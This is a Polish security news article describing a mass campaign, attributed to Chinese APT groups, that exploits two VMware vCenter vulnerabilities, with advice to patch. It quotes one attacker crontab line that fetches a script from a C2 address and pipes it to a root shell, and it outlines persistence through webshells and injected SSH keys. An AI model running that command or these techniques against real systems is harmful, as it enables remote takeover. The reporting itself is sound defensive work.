Jak oznaczać treści AI, by nie dostać kary? Zapisz się na bezpłatne szkolenie o AI Act

Konferencja Mega Sekurak Hacking Party w Krakowie – 26-27 października!

17 sierpnia startują Dni Otwarte Sekurak.Academy. Dołącz bezpłatnie 🙂

 

Chińskie grupy APT wykorzystują podatność CVE-2026-59310 do masowych ataków na środowiska VMware vCenter

23 sierpnia 2026, 15:51 | W biegu | 0 komentarzy

Zespół reagowania na incydenty firmy QUIRSO podczas analizy powłamaniowej serwera VMware vCenter natrafił na ślady globalnej kampanii, sterowanej najprawdopodobniej przez chińską grupę APT. Badania wykazały, że cyberprzestępcy wykorzystali krytyczną podatność CVE-2026-59310 (CVSS 9.8) w usłudze Syslog Server. Równolegle zidentyfikowali próby użycia drugiej luki CVE-2026-59309 (CVSS 9.8) jednak analitycy nie powiązali tych dwóch wątków ze sobą. Najprawdopodobniej były to niezależne działania różnych grup cyberprzestępczych.

TLDR:

  • Jak donosi zespół reagowania na incydenty z firmy QUIRSO, cyberprzestępcy masowo wykorzystują podatność CVE-2026-59310 do przejęcia kontroli nad VMware vCenter.
  • Podatność została oceniona jako krytyczna (CVSS 9.8) i należy do typu directory traversal. Umożliwia zdalne wykonanie kodu (RCE) z uprawnieniami roota.
  • Działania atakujących zostały powiązane z chińskimi grupami APT.
  • Jedynym sposobem na naprawę błędu jest wdrożenie poprawek producenta.

CVE-2026-59310 należy do podatności typu directory traversal, pozwalającej na zapisanie dowolnego pliku w katalogu /etc/cron.d/ bez potrzeby uwierzytelnienia. Dzięki niej możliwe jest wykonanie kodu (RCE) po stronie serwera z uprawnieniami roota.

Wykorzystanie podatności CVE-2026-59310. Źródło: medium.com

Nazwa pliku zz-poc59310 odwołuje się bezpośrednio do identyfikatora podatności, co jest zgodne z artefaktami zaobserwowanymi przez analityków z QUIRSO. W dalszej części można zauważyć wpis w crontab

* * * * * root curl -fsSL http://185.144.28.120:3232/esxi.sh | sh.

Instruuje on system, aby co minutę pobierał z zewnętrznego serwera C2 złośliwy skrypt shellowy i wykonywał go z uprawnieniami roota

Producent nie udostępnił żadnego tymczasowego obejścia problemu (workaround). Jedynym sposobem na usunięcie podatności jest wdrożenie najnowszych poprawek bezpieczeństwa.

Druga z podatności CVE-2026-59309  należy do błędu typu Authentication Bypass w usłudze katalogowej VMware Directory Service (vmdir). Pozwala ona na całkowite ominięcie procesu logowania. 

Wykorzystanie podatności CVE-2026-59309. Źródło: medium.com

Analiza wykazała, że atakującym udało się ominąć proces uwierzytelnienia w usłudze vmdir, utworzyć nowe konto użytkownika vcenter_admin, a następnie dodać je do grupy administratorów. W ten sposób cyberprzestępcy zagwarantowali sobie pełny dostęp do infrastruktury vSphere.

Mechanizm utrzymania dostępu zrealizowano przy użyciu usługi systemd z uprawnieniami roota, zadań zdefiniowanych w crontab podszywających się pod legalne procesy VMware oraz webshella JSP powiązanego z aplikacją Perfcharts. Zaobserwowano, że cyberprzestępcy włączali usługę SSH, wstrzykiwali swoje klucze publiczne i w ten sposób nawiązywali połączenie z przejętymi maszynami.

We współpracy z fundacją Shadowserver analitykom udało się oszacować skalę kampanii. Zidentyfikowano 361 unikalnych adresów IP w 47 krajach, przy czym najwięcej zainfekowanych systemów odnotowano w Niemczech, USA, Turcji, Iranie oraz Francji. Zainfekowana infrastruktura była rozproszona globalnie, co dowodzi że działania nie były wymierzone w konkretny kraj czy też region.

Lokalizacja przejętych maszyn na podstawie adresów IP. Źródło: medium.com

Co ciekawe, większość ataków została przeprowadzona w ciągu zaledwie 5 dni od momentu publikacji poprawek przez Broadcom. Wyklucza to hipotezę o ukierunkowanym ataku, a wskazuje na masową próbę przejęcia jak największej liczby podatnych urządzeń. Być może było to przygotowanie gruntu pod kolejne działania.

Badacze przypisali kampanię chińskim grupom APT bazując na analizie taktyk, technik i procedur (TTPs). Podczas ataku wykorzystano konkretne warianty webshelli JSP oraz specyficzne narzędzia typu reverse SSH stanowiące w przeszłości arsenał chińskich zespołów. Co więcej, grupy te od dawna celują w firewalle, VPN-y oraz środowiska wirtualne (vCenter, ESXi), gdzie nie da się wdrożyć klasycznych agentów EDR, a wykrycie obecności intruza należy do wyjątkowo trudnych zadań. 

Ponadto, analizując zachowanie cyberprzestępców, zauważono, że ich największa aktywność przypadała na godziny odpowiadające strefie czasowej UTC+8 (Pekin/Chiny). 

Zalecamy niezwłoczną aktualizację oprogramowania do wersji przedstawionej w poniższej tabeli oraz sprawdzenie infrastruktury pod kątem wykrycia artefaktów świadczących o ataku.

Lista podatnych wersji oprogramowania wraz z zalecanymi poprawkami. Źródło: support.broadcom.com

Opisana kampania jasno pokazuje, że serwery vCenter powinny być traktowane jako zasoby o wysokim priorytecie bezpieczeństwa. Przejęcie pojedynczego serwera zarządzającego może prowadzić do utraty kontroli nad całą warstwą wirtualizacji, a brak odpowiedniej segmentacji sieciowej oraz opóźnianie wdrożenia poprawek grozi całkowitym paraliżem organizacji.

W dobie automatyzacji oraz AI, cyberprzestępcy są w stanie niemal natychmiast przeprowadzać precyzyjne ataki na szeroką skalę.

Źródło: medium.com

~_secmike

Spodobał Ci się wpis? Podziel się nim ze znajomymi:



Komentarze

Odpowiedz